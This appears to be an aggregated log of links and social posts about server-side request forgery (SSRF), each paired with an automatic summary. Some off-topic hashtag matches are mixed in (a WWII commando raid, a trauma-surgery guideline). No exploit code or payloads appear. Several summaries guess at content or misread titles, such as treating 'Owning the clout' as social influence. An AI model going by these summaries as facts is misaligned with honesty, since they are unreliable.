| 66 | 2025-08-21 07:43:22 UTC | #Day_12 of my bug bounty journey Studying: 0 h Hunting: 6:37 h Bugs&Reports: SSRF is confirmed and working but it's a filtered one. The server allows external requests but blocks all attempts to hit internal endpoints. Time to find a bypass. #bugbounty #ssrf | On Day 12 of the bug bounty journey, the focus was on hunting for bugs, spending 6 hours and 37 minutes. An SSRF vulnerability was confirmed but found to be filtered, allowing external requests but blocking internal ones. The challenge now is to discover a bypass for this filter. The post highlights the ongoing bug bounty journey, emphasizing the need to overcome the filtering obstacle in exploiting the SSRF vulnerability. |
| 67 | 2025-08-20 13:33:43 UTC | SSRF to Internal Access: The Hidden Risk. Attackers no longer just knock on your front door; they trick your server into opening side doors for them. #CyberSecurity #SSRF #CloudSecurity #ThreatHunting #AZEFOX #InfoSec #DataSecurity #ApplicationSecurity #CyberResilience | The content discusses the hidden risk of attackers exploiting Server-Side Request Forgery (SSRF) to gain internal access by tricking servers into opening side doors. This method allows attackers to bypass traditional security measures and access sensitive data. The post emphasizes the importance of cybersecurity, cloud security, threat hunting, data security, and cyber resilience in protecting against such attacks. #CyberSecurity #SSRF #CloudSecurity #ThreatHunting #AZEFOX #InfoSec #DataSecurity #ApplicationSecurity #CyberResilience. |
| 68 | 2025-08-19 19:04:25 UTC | Zero Day Quest training: Cloudy with a chance of SSRF | Michael Fowl from the Microsoft Security Response Center leads a training session on Server-Side Request Forgery (SSRF) in the cloud. The session delves into the significance of SSRF vulnerabilities and their impact on cloud security. |
| 69 | 2025-08-16 11:28:10 UTC | Live Hacking Demo! We're exploiting SSRF in JIRA and chaining it into XSS for maximum impact. Learn how attackers think, identify weak points, and chain vulnerabilities step-by-step! Watch now: #BugBounty #SSRF #XSS | The content showcases a live hacking demo exploiting Server-Side Request Forgery (SSRF) in JIRA and chaining it into Cross-Site Scripting (XSS) for a significant impact. It aims to educate viewers on attackers' thought processes, identifying weak points, and chaining vulnerabilities systematically. The demo emphasizes learning through practical examples. Viewers are encouraged to watch the demonstration to understand the techniques used in bug bounty hunting related to SSRF and XSS. The link provided directs users to the video. |
| 70 | 2025-08-14 12:18:35 UTC | Discovered & reported a High (CVSS 7.1) Full SSRF in Microsoft SharePoint, CVE-2025-53760, now fixed. Admins: check the latest Patch Tuesday and update! Advisory: #infosec #BugBounty #SharePoint #CVE #SSRF | A high-risk Server-Side Request Forgery (SSRF) vulnerability (CVSS 7.1) in Microsoft SharePoint (CVE-2025-53760) was discovered and reported, now fixed. Admins are advised to check the latest Patch Tuesday updates for Microsoft SharePoint and apply them promptly. The advisory includes hashtags related to information security, bug bounty programs, SharePoint, CVE, and SSRF. |
| 71 | 2025-08-14 10:18:44 UTC | This short video provides a superb overview of Operation Barricade. #OperationBarricade #SSRF #62Commando #SOE #WW2 2/3 youtube.com/watch?v=MIuva7 | The content is a short video overview of Operation Barricade, a military operation during World War II involving SSRF, 62 Commando, and SOE. The video provides a concise summary of the operation's key points and historical significance. It can be viewed on YouTube using the provided link. |
| 72 | 2025-08-14 10:18:43 UTC | August 14/15 1942: A waterborne raid by SOE's Small Scale Raiding Force (No. 62 Commando) destroys a German radar station and nearby Flak sites. #OperationBarricade #SSRF #62Commando #SOE #WW2 1/3 More information: en.wikipedia.org/wiki/Operation | On August 14/15, 1942, the Small Scale Raiding Force (No. 62 Commando) conducted a waterborne raid, destroying a German radar station and Flak sites. The operation was known as Operation Barricade and was part of World War II. The raid was carried out by the Special Operations Executive (SOE). More information can be found on the Wikipedia page for Operation. |
| 73 | 2025-08-14 08:18:48 UTC | CRITICAL SSRF alert in makeplane plane 0.23.1! Password recovery flaw risks internal exposure for EU orgs. Audit & restrict now while awaiting patch. More: radar.offseq.com/threat/cve-202 #OffSeq #SSRF #Cybersecurity | A critical Server-Side Request Forgery (SSRF) vulnerability in makeplane plane 0.23.1 poses a password recovery flaw that risks internal exposure for EU organizations. It is advised to audit and restrict access while waiting for a patch. More information can be found at radar.offseq.com/threat/cve-202. This alert highlights the importance of cybersecurity measures to prevent potential breaches. #OffSeq #SSRF #Cybersecurity. |
| 74 | 2025-08-14 06:18:53 UTC | Crushing bugs one lab at a time! Another PortSwigger Web Security Academy challenge SSRF with Whitelist-Based Input Filter. #CyberSecurity #PortSwigger #SSRF #WebSecurity #BugBounty #TechandAction #TechInAction | The content highlights a cybersecurity challenge from PortSwigger Web Security Academy focusing on SSRF with a Whitelist-Based Input Filter. The post emphasizes bug crushing in labs, showcasing a hands-on approach to cybersecurity. It also includes relevant hashtags like #CyberSecurity, #PortSwigger, #SSRF, #WebSecurity, #BugBounty, #TechandAction, and #TechInAction. The challenge aims to enhance skills in identifying and mitigating security vulnerabilities. |
| 75 | 2025-08-14 04:18:34 UTC | Such a meaningful day. Publishing our guidelines in this widely available format will enhance and improve patient care as well as provide a practical and current algorithm to support decision-making. @JTraumAcuteSurg #ssrf #chestwallinjury | Publishing guidelines in a widely accessible format aims to enhance patient care and offer a practical algorithm for decision-making. This effort is seen as meaningful and beneficial for improving healthcare practices, particularly in managing chest wall injuries. The guidelines are shared via @JTraumAcuteSurg and include relevant hashtags like #ssrf and #chestwallinjury. |
| 76 | 2025-08-14 03:59:56 UTC | Best Practices to Defend Against Server-Side Request Forgery (SSRF) Attacks - chs.us | The content appears to be a title or heading rather than a detailed article. It highlights the importance of implementing best practices to defend against Server-Side Request Forgery (SSRF) attacks. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or unauthorized access. To protect against SSRF attacks, organizations should employ security measures such as input validation, restricting server access, and using secure coding practices. It emphasizes the need for vigilance and proactive defense strategies to safeguard servers from such malicious attacks. |
| 77 | 2025-08-14 03:59:53 UTC | A10 Server Side Request Forgery (SSRF) - OWASP Top 10:2021 | The content mentions A10 Server Side Request Forgery (SSRF) as part of the OWASP Top 10:2021 list. SSRF is a vulnerability where an attacker can manipulate a server into making unauthorized requests, potentially leading to data breaches or server exploitation. This issue is significant in web security and is highlighted in the latest OWASP Top 10 list as a critical concern for organizations to address to protect their systems and data. |
| 78 | 2025-08-14 03:59:51 UTC | SSRF in real life. Introduction \| by Mickael Jeanroy \| Alan Product and Technical Blog \| Medium | The content titled "SSRF in real life. Introduction" by Mickael Jeanroy on the Alan Product and Technical Blog on Medium discusses Server-Side Request Forgery (SSRF) attacks. The article likely delves into real-world examples, implications, and prevention strategies related to SSRF vulnerabilities. Mickael Jeanroy may provide insights, tips, or case studies to help readers understand and address SSRF risks effectively. |
| 79 | 2025-08-14 03:59:49 UTC | Server-Side Request Forgery (SSRF) | Server-Side Request Forgery (SSRF) is a security vulnerability where an attacker can manipulate a server into making unintended requests. This can lead to unauthorized access to internal systems, data leaks, or server exploitation. SSRF can be exploited through various methods like URL manipulation or exploiting insecure server configurations. To prevent SSRF attacks, it is crucial to validate and sanitize user input, restrict server access to sensitive resources, and implement secure coding practices. Regular security audits and updates are essential to identify and mitigate SSRF vulnerabilities to protect servers and data from exploitation. |
| 80 | 2025-08-14 03:59:47 UTC | Critical SSRF vulnerability in Microsoft Copilot Studio | A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in Microsoft Copilot Studio. This vulnerability poses a significant security risk and could potentially be exploited by attackers. It is crucial for users of Copilot Studio to take immediate action to address this vulnerability to prevent unauthorized access or manipulation of sensitive data. |
| 81 | 2025-08-14 03:59:45 UTC | Detect SSRF Attacks in Cloud Applications and APIs \| Datadog | The content discusses the importance of detecting Server-Side Request Forgery (SSRF) attacks in cloud applications and APIs. It emphasizes the need to be vigilant against this security threat to protect systems and data. Datadog offers solutions to help identify and prevent SSRF attacks in cloud environments. By detecting and addressing SSRF vulnerabilities, organizations can enhance their cybersecurity posture and safeguard their digital assets. |
| 82 | 2025-08-14 03:59:43 UTC | How to Prevent Server-Side Request Forgery \| Evolve Security | The content provided is a title that suggests it will discuss methods for preventing server-side request forgery, a common security vulnerability. However, the content itself is not included in the request, so specific prevention techniques or details are not provided. The focus is on addressing server-side request forgery to enhance security measures. |
| 83 | 2025-08-14 03:59:41 UTC | What is Server-side request forgery? | Server-side request forgery (SSRF) is a type of security vulnerability where an attacker tricks a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, and potential server exploitation. SSRF exploits the trust a server has in requests it receives, allowing attackers to manipulate the server into making requests to unintended destinations. This vulnerability can be mitigated by validating and sanitizing user input, restricting server access to sensitive resources, and implementing proper security measures. |
| 84 | 2025-08-14 03:59:39 UTC | What is SSRF (server-side request forgery)? \| Tutorial & examples \| Snyk Learn | The content discusses SSRF (server-side request forgery), explaining what it is and providing tutorials and examples. SSRF involves manipulating a server into making unintended requests on behalf of the attacker. The tutorial likely covers how to identify and prevent SSRF vulnerabilities to protect servers from unauthorized access or data leaks. It aims to educate readers on the risks associated with SSRF attacks and how to mitigate them effectively. |
| 85 | 2025-08-14 03:59:37 UTC | CWE - CWE-918: Server-Side Request Forgery (SSRF) (4.15) | CWE-918 is a Common Weakness Enumeration entry that addresses Server-Side Request Forgery (SSRF). SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. CWE-918 provides information and guidance on how to identify and mitigate SSRF vulnerabilities to enhance the security of web applications and servers. |
| 86 | 2025-08-14 03:59:31 UTC | Owning the clout through SSRF and PDF generators - Public v1.0 | The content titled "Owning the clout through SSRF and PDF generators - Public v1.0" likely discusses strategies related to Server-Side Request Forgery (SSRF) and PDF generators to gain influence or control in a public setting. It suggests leveraging these techniques to achieve a desired outcome or result. The content may explore how SSRF and PDF generators can be utilized to enhance one's position or authority in a public context. |
| 88 | 2025-08-14 03:59:23 UTC | Exploit Server-Side Request Forgery SSRF POC \| Find and Exploit Serve | The content appears to be about exploiting Server-Side Request Forgery (SSRF) through a proof of concept (POC). It likely discusses finding and exploiting vulnerabilities related to SSRF. The title suggests a focus on demonstrating how SSRF can be used to manipulate server requests for malicious purposes. |
| 89 | 2025-08-14 03:59:21 UTC | Find and Exploit Server-Side Request Forgery (SSRF) Using Burp Suite | The content is about utilizing Burp Suite to discover and exploit Server-Side Request Forgery (SSRF) vulnerabilities. SSRF allows attackers to make requests on behalf of the server, potentially accessing sensitive data or services. Burp Suite, a popular web vulnerability scanner, can help identify SSRF vulnerabilities in web applications, enabling security professionals to address and mitigate these risks. By understanding how SSRF works and using tools like Burp Suite, security experts can enhance the protection of web applications against potential exploits. |
| 90 | 2025-08-14 03:59:19 UTC | SSRF EXPLOITATION: FILE DISCLOSURE \| 2023 \| BUG BOUNTY | The content appears to focus on SSRF (Server-Side Request Forgery) exploitation specifically related to file disclosure. It seems to be related to a bug bounty program in the year 2023. The content likely discusses vulnerabilities and techniques related to exploiting SSRF for gaining unauthorized access to files. |
| 91 | 2025-08-14 03:59:17 UTC | Penetration Testing for Server-Side Request Forgery (SSRF) in E-commerce Pl | The content discusses the importance of conducting penetration testing to identify and address Server-Side Request Forgery (SSRF) vulnerabilities in E-commerce platforms. SSRF can be exploited by attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. Penetration testing helps to proactively detect and mitigate SSRF risks, ensuring the security of E-commerce platforms. |
| 92 | 2025-08-14 03:59:15 UTC | Azure SSRF Metadata | The content provided is concise and only mentions "Azure SSRF Metadata." This likely refers to Server-Side Request Forgery (SSRF) vulnerabilities related to Azure cloud services. SSRF can allow attackers to access sensitive information or resources by manipulating server requests. In the context of Azure, this may involve exploiting SSRF vulnerabilities to access metadata or internal services within Azure infrastructure. It is essential for Azure users to be aware of SSRF risks and take necessary precautions to prevent such attacks. |
| 94 | 2025-08-14 03:59:11 UTC | AppSec Tales XVII \| SSRF | The content is titled "AppSec Tales XVII \| SSRF" and likely discusses security vulnerabilities related to Server-Side Request Forgery (SSRF) in web applications. SSRF is a type of attack where an attacker can manipulate a web application to make requests on their behalf, potentially accessing internal systems or performing unauthorized actions. This content may delve into real-world examples, mitigation strategies, or case studies related to SSRF vulnerabilities in application security. |
| 95 | 2025-08-14 03:59:09 UTC | “The future of SSRF attacks” Machine learning and AI-based exploitation | The content discusses the future of Server-Side Request Forgery (SSRF) attacks, focusing on the utilization of machine learning and artificial intelligence for exploitation. This indicates a shift towards more sophisticated and automated methods for carrying out SSRF attacks. The integration of these advanced technologies suggests a potential increase in the complexity and effectiveness of SSRF attacks in the future. |
| 96 | 2025-08-14 03:59:07 UTC | “SSRF to RCE” A case study in exploiting chained vulnerabilities | The content discusses a case study involving exploiting chained vulnerabilities from Server-Side Request Forgery (SSRF) to Remote Code Execution (RCE). It likely explores how attackers can leverage SSRF vulnerabilities to ultimately achieve RCE, highlighting the importance of understanding and addressing such vulnerabilities in cybersecurity. |
| 97 | 2025-08-14 03:59:06 UTC | “Bypassing SSRF protection measures” Techniques for evading WAFs and input | The content discusses techniques for bypassing Server-Side Request Forgery (SSRF) protection measures, focusing on evading Web Application Firewalls (WAFs) and input restrictions. It likely delves into methods that can be used to circumvent security measures designed to prevent SSRF attacks, potentially highlighting vulnerabilities and strategies to exploit them. The content may provide insights into how attackers can manipulate input to bypass security controls and gain unauthorized access to sensitive information or resources. |
| 98 | 2025-08-14 03:59:03 UTC | “SSRF hunting in the cloud” Exploiting misconfigured services in cloud envi | The content discusses the exploitation of misconfigured services in cloud environments through Server-Side Request Forgery (SSRF) hunting. This involves identifying and leveraging vulnerabilities in cloud services to gain unauthorized access. The focus is on exploiting SSRF vulnerabilities in cloud environments to access internal systems or sensitive data. By detecting and exploiting misconfigurations, attackers can potentially compromise cloud infrastructure and services. The article likely provides insights into the techniques, risks, and implications of SSRF hunting in cloud environments. |
| 99 | 2025-08-14 03:59:01 UTC | Exploring the SSRF attack surface | The content is focused on exploring the SSRF (Server-Side Request Forgery) attack surface. SSRF is a type of security vulnerability that allows an attacker to manipulate a server into making unauthorized requests. By exploring the SSRF attack surface, individuals can better understand how these attacks work and how to protect against them. This type of exploration likely involves identifying potential entry points, understanding the impact of SSRF attacks, and implementing security measures to mitigate the risk of exploitation. |
| 100 | 2025-08-14 03:58:59 UTC | What is SSRF? (Portswigger – Lab: Basic SSRF against the local server) | The content titled "What is SSRF? (Portswigger – Lab: Basic SSRF against the local server)" likely discusses Server-Side Request Forgery (SSRF) and provides a lab exercise demonstrating a basic SSRF attack against a local server. SSRF is a vulnerability that allows an attacker to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. The lab exercise may involve exploiting this vulnerability to interact with the local server in a way that could be harmful or unauthorized. |
| 101 | 2025-08-14 03:58:55 UTC | SSRF vulnerabilities and where to find them | The content briefly mentions SSRF vulnerabilities and where to find them. Server-Side Request Forgery (SSRF) vulnerabilities are a type of security issue that can allow attackers to send crafted requests from a vulnerable server. These vulnerabilities can be found by conducting security assessments, penetration testing, code reviews, and using specialized tools designed to detect SSRF vulnerabilities. It is important for organizations to be aware of SSRF vulnerabilities and take steps to mitigate them to protect their systems and data from potential exploitation. |
| 103 | 2025-08-14 03:58:49 UTC | ssrf \| OSCP Notes | The content appears to be a brief mention of "ssrf \| OSCP Notes," likely indicating notes or information related to Server-Side Request Forgery (SSRF) in the context of the Offensive Security Certified Professional (OSCP) certification. This suggests that the notes may cover topics related to exploiting SSRF vulnerabilities, which are commonly tested in cybersecurity assessments like the OSCP exam. The content seems to be a placeholder or a reminder for the author to refer back to their notes on this topic. |
| 104 | 2025-08-14 03:58:47 UTC | SSRF attacks explained and how to defend against them \| CSO Online | The content discusses Server-Side Request Forgery (SSRF) attacks, explaining how they work and providing strategies to defend against them. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or server exploitation. Defenses against SSRF include input validation, whitelisting, and network segmentation. Understanding SSRF attacks and implementing proper security measures are crucial to protect against this type of threat. |
| 105 | 2025-08-14 03:58:45 UTC | Exfiltrated, Signed, Delivered – What Can Go Wrong When an Amazon Elastic C | The title suggests a discussion about potential risks or issues related to using Amazon Elastic C. It hints at the possibility of data exfiltration, which is the unauthorized transfer of data outside a network. The title implies that there may be concerns about the security or privacy of data when using Amazon Elastic C, a cloud computing service. The content seems to focus on the potential pitfalls or vulnerabilities that users might encounter when utilizing this service. |
| 106 | 2025-08-14 03:58:41 UTC | Server-side request forgery (SSRF) in Web App Penetration Testing \| 2023 | The content title mentions "Server-side request forgery (SSRF) in Web App Penetration Testing \| 2023." It suggests a focus on SSRF vulnerabilities within web applications during penetration testing in the year 2023. This indicates a specific interest in exploring and addressing security risks associated with SSRF attacks in web applications as part of a comprehensive testing approach. |
| 107 | 2025-08-14 03:58:39 UTC | NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open | NucleiFuzzer is an automation tool designed to detect vulnerabilities like XSS, SQLi, SSRF, and Open. It is powerful and efficient in identifying these security issues. |
| 108 | 2025-08-14 03:58:38 UTC | NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open | NucleiFuzzer is an automation tool designed to detect vulnerabilities like XSS, SQLi, SSRF, and Open. It offers powerful capabilities for automated security testing. |
| 109 | 2025-08-14 03:58:35 UTC | Exploiting Non-Cloud SSRF for More Fun & Profit \| by Basavaraj Banakar \| In | The content appears to focus on exploiting Non-Cloud Server-Side Request Forgery (SSRF) for increased enjoyment and financial gain. It is likely a technical article or presentation by Basavaraj Banakar that delves into the methods and implications of leveraging SSRF vulnerabilities outside of cloud environments. The content may provide insights into how SSRF can be used for malicious purposes or for ethical hacking to uncover security weaknesses. It seems to aim at educating readers on the potential risks and rewards associated with exploiting SSRF vulnerabilities in non-cloud settings. |
| 110 | 2025-08-14 03:58:33 UTC | SSRF vulnerabilities and where to find them | The content briefly mentions SSRF vulnerabilities and where to find them. Server-Side Request Forgery (SSRF) vulnerabilities occur when an attacker can manipulate a web application to make requests on their behalf, potentially accessing internal systems or performing malicious actions. These vulnerabilities can be found through security testing, code reviews, and automated scanning tools. It is crucial for developers and security professionals to be aware of SSRF vulnerabilities and take steps to mitigate them to protect against potential attacks. |
| 111 | 2025-08-14 03:58:32 UTC | Attacking APIs with SSRF and how to prevent it | The content discusses attacking APIs using Server-Side Request Forgery (SSRF) and strategies to prevent such attacks. SSRF involves manipulating a server to make requests on behalf of an attacker, potentially leading to unauthorized data access or service disruption. Preventive measures include input validation, restricting outbound traffic, using whitelists, and implementing secure coding practices. Understanding SSRF vulnerabilities and implementing protective measures can help safeguard APIs from exploitation. |
| 112 | 2025-08-14 03:58:29 UTC | Blind SSRF - The Tray | The content provided is very brief and lacks specific information or context. It seems to refer to a topic or concept related to Blind SSRF (Server-Side Request Forgery) called "The Tray." More details or additional context would be needed to provide a more comprehensive summary. |
| 113 | 2025-08-14 03:58:29 UTC | devanshbatham/Vulnerabilities-Unmasked | The content provided is a GitHub repository titled "Vulnerabilities-Unmasked" by devanshbatham. The summary is concise and does not contain any specific details or information about the repository's contents. |
| 114 | 2025-08-14 03:58:25 UTC | Breaking Down SSRF on PDF Generation: A Pentesting Guide | The content is titled "Breaking Down SSRF on PDF Generation: A Pentesting Guide." It likely discusses the topic of Server-Side Request Forgery (SSRF) in the context of PDF generation and provides a guide for penetration testing related to this issue. The focus is on understanding and potentially exploiting SSRF vulnerabilities in PDF generation processes for security testing purposes. |
| 115 | 2025-08-14 03:58:19 UTC | Securing PDF Generators Against SSRF Vulnerabilities | The content discusses the importance of securing PDF generators against Server-Side Request Forgery (SSRF) vulnerabilities. SSRF vulnerabilities can be exploited by attackers to access internal systems or resources through manipulated requests. By implementing security measures, such as input validation, whitelisting, and proper access controls, PDF generators can be protected from SSRF attacks. It is crucial for developers to be aware of these vulnerabilities and take proactive steps to secure their PDF generators to prevent unauthorized access and potential data breaches. |
| 116 | 2025-08-14 03:58:17 UTC | My First Case of SSRF Using Dirsearch \| by Mba-oji Chiagoziem \| Medium | The content appears to be a personal account titled "My First Case of SSRF Using Dirsearch" by Mba-oji Chiagoziem on Medium. The author likely shares their experience encountering a Server-Side Request Forgery (SSRF) vulnerability while using the tool Dirsearch. The article may delve into the details of how the SSRF vulnerability was discovered, the implications of such a vulnerability, and potentially offer insights or lessons learned from the experience. |
1172025-08-14 03:58:16 UTChttps://notes.defendergb.org/web-sec/vuln/ssrf
1182025-08-14 03:58:13 UTCraesene/k8s_ssrf_portscannerThe content is a reference to a GitHub repository named "raesene/k8s_ssrf_portscanner." This repository likely contains code related to scanning for open ports using Server-Side Request Forgery (SSRF) techniques within Kubernetes environments. It suggests that the repository may offer tools or scripts for scanning ports in Kubernetes clusters using SSRF methods.
1192025-08-14 03:58:11 UTCSSRF Series | HideAndSecThe content is titled "SSRF Series | HideAndSec." It appears to be part of a series related to Server-Side Request Forgery (SSRF) and is associated with a platform or group called HideAndSec. The content does not provide specific details or information beyond the title itself. It suggests that the series may focus on SSRF vulnerabilities and security practices related to this topic.
1202025-08-14 03:58:09 UTChttps://link.medium.com/dmLthOOGmyb
1212025-08-14 03:58:07 UTCMitigating SSRF in 2023The content briefly mentions the topic of mitigating Server-Side Request Forgery (SSRF) in 2023. It suggests that there are strategies or techniques to address this security vulnerability. However, the content lacks specific details or information on the methods or advancements that will be used to mitigate SSRF in the upcoming year.
1222025-08-14 03:58:05 UTCSSRF Cross Protocol Redirect Bypass · Doyensec's BlogThe content appears to be related to a security vulnerability known as SSRF (Server-Side Request Forgery) that can be exploited to bypass cross-protocol redirects. This type of vulnerability allows attackers to manipulate a server into making requests to unintended destinations, potentially leading to unauthorized access or data leakage. It is important for developers and security professionals to be aware of SSRF vulnerabilities and take necessary measures to prevent such attacks.
1232025-08-14 03:58:03 UTCUseful Mind MapsThe content provided is a title mentioning "Useful Mind Maps." However, it lacks any specific information or details to summarize further. Mind maps are visual tools that help organize information and ideas in a structured format, aiding in brainstorming, problem-solving, and learning. They are useful for capturing, organizing, and connecting thoughts and concepts visually. Mind maps can enhance creativity, improve memory retention, and facilitate better understanding of complex topics.
1242025-08-14 03:58:01 UTChttps://medium.com/@rajqureshi07/the-story-of-how-i-was-able-to-chain-ssrf-with-command-injection-vulnerability-ef31feb30ea9The content discusses a security researcher's experience chaining Server-Side Request Forgery (SSRF) with Command Injection vulnerabilities to gain control over a target system. By exploiting these vulnerabilities in tandem, the researcher was able to execute commands on the server and escalate their access. The article provides a detailed account of the steps taken to identify and exploit these vulnerabilities, highlighting the importance of understanding how different security flaws can be combined to achieve a more significant impact on a system's security.
1252025-08-14 03:57:59 UTCtop25-parameter/ssrf-parameters.txt at master · lutfumertceylan/top25-paramThe content refers to a file named "ssrf-parameters.txt" in a GitHub repository called "top25-parameter" owned by a user named "lutfumertceylan." The file seems to contain a list of parameters related to Server-Side Request Forgery (SSRF) vulnerabilities. It appears to be part of a project or repository focusing on the top 25 parameters associated with SSRF attacks.
1262025-08-14 03:57:57 UTChackerscrollsThe content provided is a title "hackerscrolls" without any additional information or context.
1272025-08-14 03:57:55 UTCpentest-book/ssrf.md at master · six2dez/pentest-bookThe content is a file named "ssrf.md" from the "pentest-book" repository on GitHub, managed by the user "six2dez." The file likely contains information related to Server-Side Request Forgery (SSRF) as indicated by its name. It is part of a larger collection of resources related to penetration testing. The repository may contain valuable insights, guides, or tools for individuals interested in cybersecurity and ethical hacking.
1282025-08-14 03:57:49 UTCUnderstanding and Testing for SSRF | CybraryThe content titled "Understanding and Testing for SSRF" on Cybrary likely covers the topic of Server-Side Request Forgery (SSRF). This type of vulnerability allows attackers to manipulate a server into making unauthorized requests on their behalf. The content probably delves into explaining what SSRF is, how it works, and methods for testing systems to identify and mitigate this security risk. It may also provide insights on how to prevent SSRF attacks and enhance the security posture of systems and applications.
1292025-08-14 03:57:45 UTCServer-Side Request Forgery Attack Explained: Definition, Types, ProtectionThe content likely provides an explanation of Server-Side Request Forgery (SSRF) attacks, covering its definition, different types, and methods for protection. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or unauthorized access. Understanding the types of SSRF attacks and implementing protective measures can help prevent such security threats.
1302025-08-14 03:57:43 UTC- CourseThe content provided is a title "Course" without any additional information or details.
1312025-08-14 03:57:41 UTCIntroduction to Server Side Request Forgery (SSRF)The content briefly introduces Server Side Request Forgery (SSRF), a type of web security vulnerability. SSRF occurs when an attacker manipulates a web application to make unauthorized requests to other servers. This can lead to data breaches, server exploitation, and unauthorized access to sensitive information. Understanding SSRF is crucial for web developers and security professionals to prevent such attacks and protect systems from potential vulnerabilities.
1322025-08-14 03:57:39 UTChacktricks/README.md at master · carlospolop/hacktricksThe content refers to a README.md file in the hacktricks repository on GitHub, maintained by user carlospolop. The README file likely contains information about the hacktricks project, which could be related to hacking techniques, cybersecurity, or other technical topics. The file serves as a guide or introduction to the project, providing users with essential information and instructions.
1332025-08-14 03:57:37 UTCSSRF (Server Side Request Forgery) - HackTricks - BoitatechThe content focuses on SSRF (Server Side Request Forgery) and is part of the HackTricks series by Boitatech. SSRF is a vulnerability that allows attackers to make requests on behalf of the server, potentially accessing internal resources or performing unauthorized actions. This type of attack can be dangerous and requires proper mitigation strategies to prevent exploitation. The content likely provides information, tips, and techniques related to identifying, exploiting, and defending against SSRF vulnerabilities.
1342025-08-14 03:57:35 UTCURL Format Bypass - HackTricksThe content titled "URL Format Bypass - HackTricks" likely delves into techniques or methods related to bypassing URL formats for various purposes. It may provide insights, tips, or tricks on how to manipulate or exploit URL formats for specific objectives. The content seems to be part of the HackTricks series, which typically offers practical information and guidance on hacking-related topics.
1352025-08-14 03:57:33 UTChttps://bugbountyguide.org/2023/01/27/how-i-owned-my-first-bounty-with-ssrf/The content discusses how the author successfully identified and exploited a Server-Side Request Forgery (SSRF) vulnerability to claim their first bug bounty. The author shares their experience, detailing the steps they took to discover and exploit the vulnerability, ultimately leading to a successful report submission and reward. The article provides insights into the process of identifying and responsibly disclosing security vulnerabilities through bug bounty programs, highlighting the importance of thorough testing and persistence in finding and reporting such issues.
1362025-08-14 03:57:31 UTCServer-Side Request Forgery(SSRF) demo on CYBERTALENTS | by Muhammad sani NThe content is about a Server-Side Request Forgery (SSRF) demonstration conducted by Muhammad Sani N on CYBERTALENTS. It likely involves showcasing how SSRF vulnerabilities can be exploited to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. This demo could serve as a learning opportunity for cybersecurity enthusiasts to understand and prevent such security risks in web applications.
1372025-08-14 03:57:29 UTCSSRF Series — The Accidental SSRF. The time I stumbled on an SSRF accidentlThe content is part of an SSRF series discussing an accidental Server-Side Request Forgery (SSRF) incident. It highlights an unexpected encounter with an SSRF vulnerability.
1382025-08-14 03:57:27 UTCServer-Side Request Forgery (SSRF) involves an attacker tricking a server iServer-Side Request Forgery (SSRF) is a type of attack where an attacker manipulates a server into making unintended requests on their behalf. This can lead to unauthorized access to internal resources, sensitive data exposure, and potential security breaches. It is crucial for organizations to implement security measures to prevent SSRF attacks, such as input validation, restricting server permissions, and using secure coding practices to mitigate this vulnerability effectively.
1392025-08-14 03:57:25 UTCHow Orca Found Server-Side Request Forgery (SSRF) Vulnerabilities in Four DOrca discovered Server-Side Request Forgery (SSRF) vulnerabilities in Four D.
1402025-08-14 03:57:21 UTChttps://github.com/yeswehack/vulnerable-code-snippetsThe link provided leads to a GitHub repository named "vulnerable-code-snippets" by YesWeHack. The repository likely contains code snippets with vulnerabilities for educational or testing purposes. It could be a resource for developers to learn about common security issues and how to address them. The repository may help individuals understand and improve their coding practices to create more secure software.
1412025-08-14 03:57:19 UTCGitHub - lutfumertceylan/top25-parameter: For basic researches, top 25 vulnThe content refers to a GitHub repository named "top25-parameter" created by a user named lutfumertceylan. It is designed for basic research purposes and focuses on the top 25 vulnerabilities. The repository likely contains information, code, or resources related to these vulnerabilities for educational or research purposes.
1422025-08-14 03:57:17 UTCHey man if I talk about the impact it is comparatively low than that of norThe content mentions that when discussing impact, it is lower in comparison to another factor.
1432025-08-14 03:57:15 UTCServer-Side Request Forgery (SSRF)- PortSwigger Labs | by Michael KoczwaraThe content is about Server-Side Request Forgery (SSRF) and is part of PortSwigger Labs. It likely discusses the concept of SSRF, which is a type of vulnerability that allows attackers to manipulate server requests from the server side. The article may cover how SSRF attacks work, their impact on security, and potential mitigation strategies. It is written by Michael Koczwara and is likely to provide insights and guidance on understanding and addressing SSRF vulnerabilities in web applications.
1442025-08-14 03:57:13 UTCLet’s Understand SSRF vulnerability | by Security Lit Limited | InfoSec WriThe content appears to focus on understanding Server-Side Request Forgery (SSRF) vulnerability, likely discussing its implications in cybersecurity. It is created by Security Lit Limited, a company specializing in information security. The article may delve into the technical aspects of SSRF, its risks, and potential mitigation strategies. It aims to educate readers on this specific security threat commonly found in web applications.
1452025-08-14 03:57:11 UTCRoadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP PThe content discusses a roadmap to cybersecurity in 2022, highlighting topics like Full-Read SSRF, IDOR in GraphQL, and GCP P. It suggests a plan or guide for enhancing cybersecurity practices in the upcoming year, focusing on areas such as server-side request forgery (SSRF), insecure direct object references (IDOR) in GraphQL, and Google Cloud Platform (GCP) security measures. The content aims to provide insights and strategies for individuals or organizations looking to strengthen their cybersecurity posture in 2022.
1462025-08-14 03:57:09 UTC$600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF ProThe content mentions a $600k bounty, Jetty features, response queue poisoning, and bypassing SSRF protection. It seems to highlight significant findings or developments related to cybersecurity, possibly in the context of bug bounties, web server features, and security vulnerabilities like response queue poisoning and SSRF bypass techniques.
